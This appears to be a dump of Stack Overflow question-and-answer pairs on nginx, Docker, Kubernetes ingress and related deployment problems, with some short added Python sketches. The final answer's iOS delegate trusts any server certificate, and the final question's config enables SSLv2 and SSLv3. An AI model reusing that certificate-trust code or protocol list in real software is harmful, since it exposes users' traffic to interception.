alias /home/app/web/staticfiles/;
}
}
First scenario
In settings.py: CORS_ALLOW_ALL_ORIGINS = True
No get/post requests work. I get the message: CORS Multiple Origin Not Allowed
Second scenario
In settings.py: CORS_ALLOWED_ORIGINS = ["http://localhost:1337"]
Works with get requests, but does not work with post requests.
For post requests:
options with error: CORS Missing Allow Header
post with error: NS_ERROR_DOM_BAD_URI
It works if I am not using nginx for the backend.
Adding request headers as requested in the comment. I am not sure what else I could add here. My deployed project is here (it is also easy to launch if you have docker on your machine): https://gitlab.com/k.impolevicius/app-001 | Cors problem with nginx/django from react app on docker
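To make the preflight contract from the answer above concrete, here is a small Python sketch; the helper function is hypothetical, and the allowed origin is the one from the question:

```python
# Sketch of the headers a server must return on a CORS preflight (OPTIONS)
# request for this setup; the allowed origin comes from the question.
ALLOWED_ORIGIN = "http://localhost:1337"
ALLOWED_METHODS = ["GET", "POST", "OPTIONS"]
ALLOWED_HEADERS = ["Content-Type"]

def preflight_response_headers(request_headers):
    """Build the response headers for an OPTIONS preflight request."""
    requested_method = request_headers.get("Access-Control-Request-Method", "")
    headers = {
        "Access-Control-Allow-Origin": ALLOWED_ORIGIN,
        "Access-Control-Allow-Methods": ", ".join(ALLOWED_METHODS),
        "Access-Control-Allow-Headers": ", ".join(ALLOWED_HEADERS),
    }
    # A method outside the allowed set would make the browser reject the call.
    allowed = requested_method in ALLOWED_METHODS
    return headers, allowed

headers, ok = preflight_response_headers({"Access-Control-Request-Method": "POST"})
```

Whether these headers are emitted by Django (via django-cors-headers) or by nginx (via add_header), the browser only needs to see all three on the OPTIONS response.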
NOTE: No, there is no extra addon/extension in PHP for str_replace.
str_replace() is a built-in string function in PHP 4, PHP 5, PHP 7 and PHP 8.
In your code there can be 2 possible errors, given that your code runs locally and your files have write permissions.
The first point is that your /config/constants.php file is too big, which is why the foreach loop takes too much time and exits; but in that case PHP should throw an error.
The second point is that you are using the Laravel config, so your $searchfor variable comes from bootstrap/cache/config.php. You are replacing the value based on the cached config value, but maybe your /config/constants.php doesn't have this exact key-value, or there are some spaces in between. I think you got my point. | I am developing a laravel ride sharing application, and for the settings data I used config files. To change any value I use file_get_contents, then str_replace, and file_put_contents to update the value.
Here is a code example:
$config = base_path() . '/config/constants.php';
$file = file_get_contents($config);
$change_content = $file;
foreach ($request->all() as $key => $value) {
$value = (trim($value) == 'on') ? '1' : trim($value);
$searchfor = config('constants.' . $key);
if ($value != $searchfor) {
$search_text = "'" . $key . "' => '" . $searchfor . "'";
$value_text = "'" . $key . "' => '" . $value . "'";
$change_content = str_replace($search_text, $value_text, $change_content);
}
file_put_contents($config, $change_content);
}
But $change_content doesn't return any value on the AWS server.
NOTE: This works on my local machine and also in cPanel, but not in AWS EC2. I am using PHP 7.4 and Nginx on Ubuntu 20.04, with the same configuration for cPanel, local, and AWS EC2.
Can anyone tell me if there is any extra configuration needed for str_replace? | str_replace() is not working in aws server returning empty string but working on cpanel and locally
Generating a wildcard certificate with cert-manager (letsencrypt) requires the usage of the DNS-01 challenge instead of the HTTP-01 challenge used in the link from the question:
Does Let's Encrypt issue wildcard certificates?
Yes. Wildcard issuance must be done via ACMEv2 using the DNS-01 challenge. See this post for more technical information.
There is documentation about generating the wildcard certificate with cert-manager:
Cert-manager.io: Docs: Configuration: ACME: DNS-01
From the perspective of DigitalOcean, there is a guide specifically targeted at it:
This provider uses a Kubernetes Secret resource to work. In the following
example, the Secret will have to be named digitalocean-dns and have a
sub-key access-token with the token in it. For example:
apiVersion: v1
kind: Secret
metadata:
name: digitalocean-dns
namespace: cert-manager
data:
# insert your DO access token here
access-token: "base64 encoded access-token here"The access token must have write access.To create a Personal Access Token, seeDigitalOcean documentation.Handy direct link:https://cloud.digitalocean.com/account/api/tokens/newTo encode your access token into base64, you can use the followingecho -n 'your-access-token' | base64 -w 0apiVersion: cert-manager.io/v1
kind: Issuer
metadata:
name: example-issuer
spec:
acme:
...
solvers:
- dns01:
digitalocean:
tokenSecretRef:
name: digitalocean-dns
key: access-token
-- Cert-manager.io: Docs: Configuration: ACME: DNS-01: DigitalOcean
I'd reckon these additional resources could also help:
Stackoverflow.com: Questions: Wildcard SSL certificate with subdomain redirect in Kubernetes
Itnext.io: Using wildcard certificates with cert-manager in Kubernetes | I followed this DigitalOcean guide https://www.digitalocean.com/community/tutorials/how-to-set-up-an-nginx-ingress-with-cert-manager-on-digitalocean-kubernetes, and I came across something quite strange. When in the hostnames I set a wildcard, then letsencrypt fails in issuing a new certificate, while when I only set defined sub-domains, it works perfectly.
kind: Ingress
metadata:
name: my-ingress
annotations:
cert-manager.io/cluster-issuer: "letsencrypt-staging"
spec:
tls:
- hosts:
- example.com
- api.example.com
secretName: my-tls
rules:
- host: example.com
http:
paths:
- backend:
serviceName: example-frontend
servicePort: 80
- host: api.example.com
http:
paths:
- backend:
serviceName: example-api
servicePort: 80
And this is, instead, the wildcard certificate I'm trying to issue, which fails, leaving the message "Issuing":
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: my-ingress
annotations:
cert-manager.io/cluster-issuer: "letsencrypt-staging"
spec:
tls:
- hosts:
- example.com
- *.example.com
secretName: my-tls
rules:
- host: example.com
http:
paths:
- backend:
serviceName: example-frontend
servicePort: 80
- host: api.example.com
http:
paths:
- backend:
serviceName: example-api
servicePort: 80
The only difference is the second line of the hosts. Is there a trivial, well-known solution I am not aware of? I am new to Kubernetes, but not to DevOps. | Generate wildcard certificate on Kubernetes cluster with DigitalOcean for my Nginx-Ingress
I have no idea why, but it works after I copied nginx.conf and mime.types into /etc/nginx from this link. Thank you @Daniel Mesa | Right after installing Nginx on Ubuntu, it's not starting. I've no idea what's happening. I tried creating nginx.conf by myself but nothing changed:
● nginx.service - A high performance web server and a reverse proxy server
Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
Active: failed (Result: exit-code) since Fri 2021-01-08 15:12:18 UTC; 1min 49s ago
Docs: man:nginx(8)
Jan 08 15:12:18 root systemd[1]: Starting A high performance web server and a reverse proxy server...
Jan 08 15:12:18 root nginx[3367]: nginx: [emerg] open() "/etc/nginx/nginx.conf" failed (2: No such file or d
Jan 08 15:12:18 root nginx[3367]: nginx: configuration file /etc/nginx/nginx.conf test failed
Jan 08 15:12:18 root systemd[1]: nginx.service: Control process exited, code=exited status=1
Jan 08 15:12:18 root systemd[1]: nginx.service: Failed with result 'exit-code'.
Jan 08 15:12:18 root systemd[1]: Failed to start A high performance web server and a reverse proxy server. | Nginx not starting after installed [emerg] open() "/etc/nginx/nginx.conf" failed (2: No such file |
I also understand that it's impossible to have 2 Ingress serving External HTTP request
I am not sure where you've found this, but you totally can do this.
kind: Ingress
metadata:
name: frontdoor-bar
namespace: myapps
annotations:
kubernetes.io/ingress.class: nginx
cert-manager.io/cluster-issuer: letsencrypt-prod
nginx.ingress.kubernetes.io/rewrite-target: /$1
nginx.ingress.kubernetes.io/use-regex: "true"
nginx.ingress.kubernetes.io/affinity: "cookie"
nginx.ingress.kubernetes.io/session-cookie-name: "PHPSESSID"
nginx.ingress.kubernetes.io/session-cookie-expires: "172800"
nginx.ingress.kubernetes.io/session-cookie-max-age: "172800"
spec:
type: LoadBalancer
tls:
- hosts:
- bar.foo.dev
secretName: tls-secret-bar
rules:
- host: bar.foo.dev
http:
paths:
- backend:
serviceName: barfoo
servicePort: 80
path: /(.*)
---
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: frontdoor-foo
namespace: myapps
annotations:
kubernetes.io/ingress.class: nginx
cert-manager.io/cluster-issuer: letsencrypt-prod
nginx.ingress.kubernetes.io/backend-protocol: "FCGI"
nginx.ingress.kubernetes.io/fastcgi-index: "index.php"
nginx.ingress.kubernetes.io/fastcgi-params-configmap: "example-cm"
spec:
type: LoadBalancer
tls:
- hosts:
- foo.bar.dev
secretName: tls-secret-foo
rules:
- host: foo.bar.dev
http:
paths:
- backend:
serviceName: foobar
servicePort: 9000
path: /(.*)
This is a completely valid ingress configuration, and most probably the only valid one that will solve your problem.
Each ingress object configures one domain. | I have different applications running in the same Kubernetes Cluster. I would like multiple domains to access my Kubernetes Cluster and be redirected depending on the domain.
For each domain I would like different annotations/configuration.
Without the annotations I have an ingress deployment such as:
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: frontdoor
namespace: myapps
annotations:
kubernetes.io/ingress.class: nginx
cert-manager.io/cluster-issuer: letsencrypt-prod
spec:
type: LoadBalancer
tls:
- hosts:
- foo.bar.dev
- bar.foo.dev
secretName: tls-secret
rules:
- host: foo.bar.dev
http:
paths:
- backend:
serviceName: foobar
servicePort: 9000
path: /(.*)
- host: bar.foo.dev
http:
paths:
- backend:
serviceName: varfoo
servicePort: 80
path: /(.*)
But they need to have multiple configurations; for example, one needs to have the following annotations:
nginx.ingress.kubernetes.io/rewrite-target: /$1
nginx.ingress.kubernetes.io/use-regex: "true"
nginx.ingress.kubernetes.io/affinity: "cookie"
nginx.ingress.kubernetes.io/session-cookie-name: "PHPSESSID"
nginx.ingress.kubernetes.io/session-cookie-expires: "172800"
nginx.ingress.kubernetes.io/session-cookie-max-age: "172800"
And another would have this one:
nginx.ingress.kubernetes.io/backend-protocol: "FCGI"
nginx.ingress.kubernetes.io/fastcgi-index: "index.php"
nginx.ingress.kubernetes.io/fastcgi-params-configmap: "example-cm"
Those configurations are not compatible, and I can't find a way to specify a configuration by host. I also understand that it's impossible to have 2 Ingress serving external HTTP requests. So what am I not understanding / doing wrong? | Kubernetes - multiple configuration in one Ingress
I found the answer myself. The following snippet shows how to do it with the help of the http-streaming library of videojs -
| I am using videojs in a live streaming environment and using nginx secure URLs to protect the stream. See here for the details - https://www.nginx.com/blog/securing-urls-secure-link-module-nginx-plus/
The algorithm works fine and the player is able to detect when the live.m3u8 file becomes available. However, when playing the stream, I just get a spinning wheel. On the JS console, I see that the sub-playlist URL, e.g. live_109.m3u8, does not have the required md5 hash and expiry timestamp, and hence nginx is returning 403.
The stream URL format is - https://example.com/video/live.m3u8?md5=xznbbmbbbbbxncb&expire=123456788
When I play the stream, the console suggests that the player is now trying to call https://example.com/video/live_109.m3u8
And since without the md5 and expiry parameters nginx will send 403, that is what I am getting.
Adding ?md5=xznbbmbbbbbxncb&expire=123456788 works perfectly with live_109.m3u8 as well. I am sure the same problem will occur with the individual segments (.ts files).
My question here is: how can I append ?md5=xznbbmbbbbbxncb&expire=123456788 to every .m3u8 and .ts file being called from the page? | Appending paramaters to each m3u8 and ts file while playing live stream
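Since the accepted answer's snippet is not shown, here is a rough, library-agnostic Python sketch of what appending the secure-link parameters to every playlist entry involves (an illustration of the idea only, not the videojs http-streaming solution; the token values are the placeholders from the question):

```python
# Append the secure-link query string to every .m3u8 / .ts URI in a playlist.
# Lines starting with '#' are HLS tags and are left untouched.
def sign_playlist(m3u8_text, query):
    out = []
    for line in m3u8_text.splitlines():
        if line and not line.startswith("#"):
            sep = "&" if "?" in line else "?"
            line = line + sep + query
        out.append(line)
    return "\n".join(out)

playlist = "#EXTM3U\n#EXTINF:6.0,\nlive_109.ts"
signed = sign_playlist(playlist, "md5=xznbbmbbbbbxncb&expire=123456788")
```

In the player, the same transformation has to be applied to each sub-playlist and segment URI before the request is made, which is what the http-streaming hooks make possible.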
Feeding from Ivan's response and finalizing my solution as:
server {
listen 443 ssl;
server_name app1.domain.com;
location / {
sub_filter '/myapp/' '/'; # rewrites HTML strings to remove context
sub_filter_once off; # ensures it loops through the whole HTML (required)
proxy_pass http://localhost:8080/myapp/;
}
}
| I'm trying to do a basic NGINX reverse proxy by subdomain, to localhost/folder, and am stumped getting it to rewrite my assets+links. My http://localhost:8080/myapp/ works like a charm, but via NGINX+subdomain it fails on the subfolder assets. I believe I'm stumped on the 'rewrite' clause for NGINX. How can I rewrite the HTML going to the client browser to drop the /myapp/ context?
server {
listen 443 ssl;
server_name app1.domain.com;
location / {
rewrite ^/myapp/(.*) /$1 break; # this line seems to do nothing
proxy_pass http://localhost:8080/myapp/;
}
}
I'm expecting my resultant HTML (via https://app1.domain.com) to be rewritten without the subfolder /myapp/, so when assets are requested they can be found instead of returning a 404 against https://app1.domain.com/myapp/assets/. It should just be https://app1.domain.com/assets/ (which works if I go there manually) -- thanks. | NGINX proxy_pass rewrite asset uri
I solved this issue moving my application to AWS and saving the files in S3! | I have clients that have the browser open all day so after I make a deployment they see the application broken and they need to reload the page to fix it.The server failed to load a chunk file because of the NO-CACHE hash added by @angular/cli production build.Error:error: Uncaught (in promise): Error: Loading chunk 11 failed.I want to reload the page after a deployment.These are my tools:I have access to my NGINX configuration.I have access to Jenkins (Blue Ocean)I have implemented HttpClient Interceptors in the project. | Angular - Load Production chunk files failed after deploy |
location ~* ^/ matches any URI that begins with /, which is any URI that hasn't already matched an earlier regular expression location rule.
To match only the URI / and nothing else, use the $ operator:
location ~* ^/$ { ... }
Or even better, an exact match location block:
location = / { ... }
See this document for more. | I want to redirect:
https://dev.abc.com/ to https://uat.abc.com/
https://dev.abc.com/first to https://uat.abc.com/first
https://dev.abc.com/second to https://uat.abc.com/
https://dev.abc.com/third/ to https://dev.abc.com/third/ (points to the same)
I have tried with the following config and achieved the first three, but the last one is also redirecting to uat. Can anyone help me in this situation?
server {
listen 80;
server_name dev.abc.com;
root /var/www/
location ~* ^/first{
return 301 https://uat.abc.com$request_uri;
}
location ~* ^/second{
return 301 https://uat.abc.com;
}
location ~* ^/{
return 301 https://uat.abc.com$request_uri;
}
Can anyone help me with this configuration? | Rewrite all url to another url except one in nginx
You need to do it like this:
location /foo {
if ($args ~* "(.*)(example\.com)(.*)") {
set $args "$1example.net$3";
return 301 $scheme://$host$uri$is_args$args;
}
} | Folks! We have the following http request:
http://example.com/foo?redirect_uri=http%3A%2F%2Fexample.com%2Fbar
We want to change redirect_uri from "example.com" to "example.net". How to do it? Thanks | How to write nginx rewrite rule for replacing query param in query string
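The capture-group substitution in the answer above can be prototyped with the same regular expression in Python to preview the resulting query string (the URL-encoded value is the one from the question):

```python
import re

# Mirror of the nginx rule: capture what surrounds "example.com" in the
# query string and splice "example.net" in its place.
def rewrite_args(args):
    return re.sub(r"(.*)(example\.com)(.*)", r"\1example.net\3", args)

new_args = rewrite_args("redirect_uri=http%3A%2F%2Fexample.com%2Fbar")
```

Note that the host name appears literally even inside the URL-encoded value, which is why a plain text substitution on $args is enough here.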
PythonAnywhere dev here. Unfortunately you can't change the nginx settings on our system -- but the system-default settings are actually pretty much what you'd want. If you're using the "Static files" table on the "Web" tab to specify where they are, then:
When a browser requests a static file for the first time, it's sent back with a header saying when it was last modified (based on the file timestamp).
When the browser requests the static file after that, and it has a copy in its cache, it will normally send an "if-modified-since" header with the value of the last-modified header it got the first time around.
The server will check the file timestamp, and if the file hasn't changed, it will send back an HTTP 304 ("not modified") response with no content, so the browser knows it can just use the cached one. If the file has changed, then of course it sends back a normal 200 response with the new content and an updated last-modified timestamp for the browser to cache. | I am trying to "leverage browser caching" in order to increase site speed. The webapp is hosted on pythonanywhere and I guess I need to configure the nginx.conf file to include:
location ~* \.(css|js|gif|jpe?g|png)$ {
expires 168h;
add_header Pragma public;
add_header Cache-Control "public, must-revalidate, proxy-revalidate";
}
(from here: how to Leverage browser caching in django)
However I can't find the conf file anywhere. It is not in /etc/nginx, /usr/local/etc, /usr/etc ...
Can this be done on pythonanywhere? | Configure nginx server on Pythonanywhere
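The If-Modified-Since flow described in the answer can be sketched as a tiny decision function; this is a simplified model (timestamps as plain numbers, no ETags or clock skew), not PythonAnywhere's actual implementation:

```python
# Simplified model of the conditional-request handshake described above:
# return 304 when the cached timestamp is still current, 200 otherwise.
def respond(file_mtime, if_modified_since=None):
    if if_modified_since is not None and file_mtime <= if_modified_since:
        return 304  # browser may reuse its cached copy
    return 200      # send fresh content plus a new Last-Modified

first = respond(file_mtime=1000)                       # no cache yet
repeat = respond(file_mtime=1000, if_modified_since=1000)
after_edit = respond(file_mtime=2000, if_modified_since=1000)
```

This is why the system defaults are "pretty much what you'd want": unchanged files cost only a cheap 304 round trip rather than a full transfer.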
The rewrite statement is an implicit rewrite...last, which means that the final URI /119.img is not processed by this location block. By the time the response headers are being calculated, nginx is in a different location block.
root /path/to/file;
rewrite ^ /119.img break;
add_header x-amz-meta-sig 1234567890abcdef;
}If thelocationis intended to match only one URI, use the=format. Seethis documentfor details.Note also that the presence of anadd_headerstatement in thislocationblock, will mean that the outer statement will no longer be inherited. Seethis documentfor details.
: | I try to add a response header to only one location path served and have an nginx config looks likeserver {
...
add_header x-test test;
location /my.img {
rewrite ^/my.img$ /119.img;
add_header x-amz-meta-sig 1234567890abcdef;
}
}
But only the top-level header (x-test) is effective; the one within the location directive does not show up, as shown in:
$ curl -v -o /tmp/test.img 'https://www.example.com/my.img'
< HTTP/1.1 200 OK
< Server: nginx/1.9.3 (Ubuntu)
< Date: Sun, 14 May 2017 23:58:08 GMT
< Content-Type: application/octet-stream
< Content-Length: 251656
< Last-Modified: Fri, 03 Mar 2017 04:57:47 GMT
< Connection: keep-alive
< ETag: "58b8f7cb-3d708"
< x-test: test
< Accept-Ranges: bytes
<
{ [16104 bytes data]
How to send back a custom header only for the specific file served? | add header to response in nginx location directive
You need to use: nginx -g "daemon off;", with the option quoted. | I'm currently trying to execute a bash script inside my Nginx container and then of course keep it alive. So, my idea was to do what I need to in the bash script and, as the last command, run the command found with a docker-compose ps. But the container keeps shutting down. Here is a summary of what I currently have.
The Dockerfile:
FROM nginx:latest
COPY ./run.sh /root/run.sh
RUN ["chmod", "+x", "/root/run.sh"]
CMD ["/root/run.sh"]run.sh#!/bin/bash
nginx -g daemon off;Am I missing something? | Keep an Nginx alive after a bash script |
Place thereturnstatement inside alocationblock:For example:server {
listen 8080;
server_name my_example.com;
location /.well-known/acme-challenge/ {
root /var/www/encrypt;
}
location / {
return 301 https://$server_name$request_uri;
}
}Also, simplified your otherlocationblock. | I want to be able, if the request tries to access/.well-known/acme-challenge/to serve the matching file if found.If the request is something else, I want to redirect it tohttps://server {
listen 8080;
server_name my_example.com;
location /.well-known/acme-challenge/ {
alias /var/www/encrypt/.well-known/acme-challenge/;
try_files $uri =404;
}
return 301 https://$server_name$request_uri;
}Problem is when accessing tomy_example.com/.well-known/acme-challenge/12345which exist in alias path, i'mstillredirected to https:// and the browser doesn't download the file.How can I just serve the file and not apply the redirection in this case ?Thanks | Nginx location alias + redirection |
Simply install necessary extensions and restart fpm process:sudo apt-get install php-mysqlnd php-mysqli
sudo /etc/init.d/php7.0-fpm restart | How can I fix this? im trying to do acleaninstall of wordpresslateston ubuntu 16 runningnginxforPhp7When i access :http://blog.mysite.com/wordpress/I get:Your PHP installation appears to be missing the MySQL extension which
is required by WordPress.How can i resolve this? | Php7 Installation of wordpress on nginx throwing PHP installation missing MySQL extension which is required by WordPress |
This can be done easily with the ngx-perl or ngx-lua modules. But if you don't have them installed, or are just looking for an old-school solution, there is a way to solve the problem with the good old rewrite magic and regular expressions:
server {
listen 80;
server_name ~^(prefix(?[0-9]+)).domain.com;
location / {
# Since it's always wise to validate the input, let's
# make sure there's no more than two digits in the variable.
if ($variable ~ ".{3}") { return 400; }
# Initialize the port variable with the value.
set $custom_port 14$variable;
# Now, depending on the $variable, $custom_port can contain
# values like 1455, which is correct, or like 149, which is not.
# Nginx does not have any functions like "replace" that could be
# used on random variables. However, the rewrite directive can
# replace strings using regular expression patterns. The only
# problem is that the rewrite only works with one specific variable,
# namely, $uri.
# So the trick is to assign the $uri with the string we want to change,
# make necessary replacements and then restore the original value or
# the $uri:
if ($custom_port ~ "^.{3}$") { # If there are only 3 digits in the port
set $original_uri $uri; # Save the current value of $uri
rewrite ^ $custom_port; # Assign the $uri with the wrong port
rewrite 14(.) 140$1; # Put an extra 0 in the middle of $uri
set $custom_port $uri; # Assign the port with the correct value
rewrite ^ $original_uri; # And restore the $uri variable
}
proxy_pass http://127.0.0.1:$custom_port;
}
} | Is there any way I can do a simple math calculation in an nginx configuration file? Let's say I want to do a proxy_pass based on the host domain. I am able to redirect the host to the correct port number when the prefix is 0 to 9. However, what I really want is prefix10 to map to port 1410, but based on my configuration right now it will proxy to port 14010.
Host:
http://prefix0.domain.com -> 127.0.0.1:1400
http://prefix10.domain.com -> 127.0.0.1:1410
http://prefix99.domain.com -> 127.0.0.1:1499
server {
listen 80;
server_name ~^(prefix(?[0-9]+)).domain.com;
location / {
proxy_pass http://127.0.0.1:140$variable;
}
} | how to do simple math calculation for variable in nginx configuration file |
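The zero-padding trick from the answer is easier to see outside nginx; here is a hedged Python sketch of the intended prefixN-to-port mapping that the rewrite gymnastics emulate:

```python
# prefix0 -> 1400, prefix10 -> 1410, prefix99 -> 1499: the numeric suffix is
# zero-padded to two digits and appended to "14", which is exactly what the
# rewrite trick in the answer emulates via the $uri variable.
def backend_port(prefix_digits):
    if len(prefix_digits) > 2:
        raise ValueError("at most two digits")  # mirrors the `return 400` guard
    return "14" + prefix_digits.zfill(2)

ports = [backend_port(d) for d in ("0", "10", "99")]
```

With ngx-lua available, the same two lines of padding logic could replace the whole rewrite dance.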
It is easy. If your nginx config looks like this:
server {
server_name _; #catch all
...
You can add to the hosts file on your host machine the line 127.0.0.1 myproject.dev, and your container will be available at the url http://myproject.dev:<exposed port>. If you expose your container on port 80, you can simply type the url http://myproject.dev (like the good old days). But remember you can run only one container on port 80 at the same time. | I'm new to docker, and have recently installed a docker container/image using the phpdocker.io (php7, nginx, mysql) generator. I started it using docker-compose and it's working awesome. If I go to localhost/phpinfo.php my regular system php version loads (5.6); if I go to localhost:8080/phpinfo.php my docker php version loads (7.0), so it's working ok. My question is: is there any way to map my localhost:8080 to a regular domain name like I normally do with my regular localhost projects, without having to use localhost:8080, i.e. myproject.dev? Not sure if this is specifically docker related or not. | Map docker container to regular dev domain name
Community edition of Nginx does not provide such functionality.A commercial version of Nginx provides. There ismax_connsparameter inupstream's servers:upstream my_backend {
server 127.0.0.1:11211 max_conns=32;
server 10.0.0.2:11211 max_conns=32;
}The documentation ishere | trying to use NGINX as reverse proxy,
and would like to have constant number of open connections to backend (upstream) open at all times.Is this possible with nginx (maybe haproxy..?) ??running on ubuntu if it makes any difference | is it possible for NGINX to have a pool of N open connections to backend? |
If Apache2 is running WordPress, you need to configure nginx to proxy everything. At the moment you have both nginx and Apache2 rewriting URIs to /index.php, and because nginx does it first, WordPress never sees the original URI.
listen 80;
server_name testblog.com;
location / {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header Host $host;
proxy_pass http://127.0.0.1:8182;
}
}And if you decide to allow some of the static URIs to be served bynginxfine. But you can't letnginxmap URIs to/index.phpbecause that will not work. | I have just installed wordpress on ubuntu 14.04 LTS. Nginx acts as reverse proxy for apache2.wp-admin is working fine, but I am unable to open the homepage.Nginx Server Code:server {
listen 80;
root /var/www/html/testblog;
index index.php index.html index.htm;
server_name testblog.com;
location / {
# try_files $uri $uri/ =404;
try_files $uri $uri/ /index.php?q=$uri&$args;
}
error_page 404 /404.html;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
location ~ \.php$ {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header Host $host;
proxy_pass http://127.0.0.1:8182;
}
location ~ /\.ht {
deny all;
}
}Apache Virtual Host Conf:
ServerName testblog.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/testblog
ErrorLog ${APACHE_LOG_DIR}/errortest.log
CustomLog ${APACHE_LOG_DIR}/accesstest.log combined
My /etc/hosts:
127.0.0.1 localhost
127.0.0.1 ubuntu
127.0.1.1 testblog.comI have all the wp files in the folder /var/www/html/testblog/.testblog.com/wp-admin: working fine.testblog.com: giving too many redirects.Here is my settings page:I guess my settings are correct. I have tried defining WP_HOME and WP_SITEURL in wp-config.php, but no luck.My /var/www/html/testblog/.htaccess:# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPresstestblog.com/wp-admin: working.testblog.com: giving too many redirects errorAny help is highly appreciated.Edit:I have already disabled all the plugins. | too many redirects for wordpress on nginx with apache2 |
There is no definitive list of the file types you would want to gzip. Any file type readable as plain text (i.e. non-binary files) is able to be gzipped, and so a "definitive" list would be massive. Therefore, it ultimately depends on which file types you are actually serving, which you can check for any given file via the HTTP Content-Type header.
If you want to be doubly sure you are covering all possible MIME types for a particular extension (which I think is reasonable), looking at this SO post, this text file contains a pretty darn exhaustive list.
It's important to note that some binary file types like .png and .pdf (even .woff) incorporate compression into the format itself, and as such should not be gzipped (because doing so could produce a compressed file larger than the original). My rule of thumb is: if my code editor can't read the file as UTF-8 text, gzipping the file would not be wise (or at least it wouldn't be very efficient).
FWIW, I typically gzip the following formats (in my Apache .htaccess) on my site:
AddOutputFilterByType DEFLATE text/html text/xml text/css text/javascript application/javascript application/x-javascript application/json application/xml image/svg+xml
| In several nginx tutorial sites explaining "how to set up gzip compression," I've seen this list of MIME types repeated:
gzip_types text/plain text/html text/css application/x-javascript text/xml application/xml application/xml+rss text/javascript;
However, I immediately found that this list did not result in compression being enabled for JavaScript in Chromium. I had to add application/javascript to the list, which leads me to believe this list is outdated. Is there a definitive list of all the content types I would want to gzip? | nginx which content types to enable compression for
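The rule of thumb from the answer (gzip text-like types, skip formats that are already internally compressed) could be sketched like this in Python; the lists are illustrative, not exhaustive:

```python
# Heuristic from the answer: gzip text-like types; skip formats that are
# already internally compressed (png, jpeg, woff, pdf, ...).
ALREADY_COMPRESSED = {
    "image/png", "image/jpeg", "image/gif", "application/pdf", "font/woff",
}

def should_gzip(content_type):
    if content_type in ALREADY_COMPRESSED:
        return False
    if content_type.startswith("text/"):
        return True
    # Common text-in-disguise application types.
    return content_type in {
        "application/javascript", "application/json",
        "application/xml", "image/svg+xml",
    }

decisions = {ct: should_gzip(ct) for ct in ("text/html", "application/json", "image/png")}
```

Whatever final list you settle on becomes the value of gzip_types; the function above is just a way to reason about which types belong there.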
Try this:
map $upstream_response_time $temprt {
default $upstream_response_time;
"" 0;
}
$upstream_response_time is either a number or unset. Nginx logs unset variables as a dash (-), but map treats them as empty strings. | I have my NGINX logs formatted as JSON:
log_format le_json '{ "@timestamp": "$time_iso8601", '
'"remote_addr": "$remote_addr", '
'"remote_user": "$remote_user", '
'"body_bytes_sent": "$body_bytes_sent", '
'"status": $status, '
'"request": "$request", '
'"request_method": "$request_method", '
'"response_time": $upstream_response_time, '
'"http_referrer": "$http_referer", '
'"http_user_agent": "$http_user_agent" }';My log gets picked up by filebeat and sent to Logstash that have the following config:input {
beats {
port => 5044
codec => "json"
}
}
filter {
geoip {
database => "C:/GeoLiteCity.dat"
source => "[remote_addr]"
}
}
output {
elasticsearch {
template => "C:/ELK/logstash-2.2.2/templates/elasticsearch-template.json"
template_overwrite => true
hosts => ["127.0.0.1"]
index => "%{[@metadata][beat]}-%{+YYYY.MM.dd}"
document_type => "%{[@metadata][type]}"
}
}

The problem I'm having is with $upstream_response_time. When there is no response time, NGINX puts a '-' in this spot. As you can see, I don't put "" around $upstream_response_time because I want it as a number, so I can perform calculations with it in Kibana and display them. When '-' is sent, I get a jsonparsefailure in Logstash because it is not a number.

I would like to set all the '-' to 0. What would be the best way to do this?
I've had no success trying to filter it in the nginx config. I think it needs to be done prior to getting shipped to Logstash, because that's where the parse failure occurs.

Any ideas? | NGINX log filter $upstream_response_time JSON ELK "-" parsefailure
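The transformation the map directive above performs is simply "dash or empty becomes 0, numbers pass through". For clarity, here is the same rule sketched in Python (illustrative only; this is not part of the nginx or Logstash config):

```python
def normalize_response_time(value):
    """Mirror the nginx map: '-' or '' -> 0, otherwise keep the number."""
    if value in ("-", ""):
        return 0
    return float(value)
```

Applied to the example log, '-' entries become valid JSON numbers instead of parse failures.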
I figured out the issue. It has nothing to do with App Transport Security. I had to make sure that iOS trusts the certificate, since it's not from a trusted authority.

The old-school way of doing this, overriding NSURLRequest.allowsAnyHTTPSCertificateForHost, doesn't work. Since I'm using NSURLSession, you have to do it with this:

- (id) init {
self = [super init];
NSURLSessionConfiguration * config = [NSURLSessionConfiguration defaultSessionConfiguration];
self.session = [NSURLSession sessionWithConfiguration:config delegate:self delegateQueue:[NSOperationQueue mainQueue]];
return self;
}
- (void) URLSession:(NSURLSession *)session didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential * _Nullable))completionHandler {
completionHandler(NSURLSessionAuthChallengeUseCredential,[NSURLCredential credentialForTrust:challenge.protectionSpace.serverTrust]);
}

| I've spent a while trying to get this working. I have an API that I'm connecting to that I'm trying to switch to SSL with self-signed certificates. I have control of both the server and the app.

I generated a self-signed cert according to this: https://kyup.com/tutorials/create-ssl-certificate-nginx/

sudo openssl genrsa -des3 -out ssl.key 2048
sudo openssl req -new -key ssl.key -out ssl.csr
sudo cp ssl.key ssl.key.orig & sudo openssl rsa -in ssl.key.orig -out ssl.key
sudo openssl x509 -req -days 365 -in ssl.csr -signkey ssl.key -out ssl.crtI've tried some config options on the server (NGINX)ssl on;
ssl_certificate /etc/nginx/ssl/ssl.crt;
ssl_certificate_key /etc/nginx/ssl/ssl.key;
ssl_session_timeout 5m;
ssl_protocols SSLv2 SSLv3 TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!MD5;
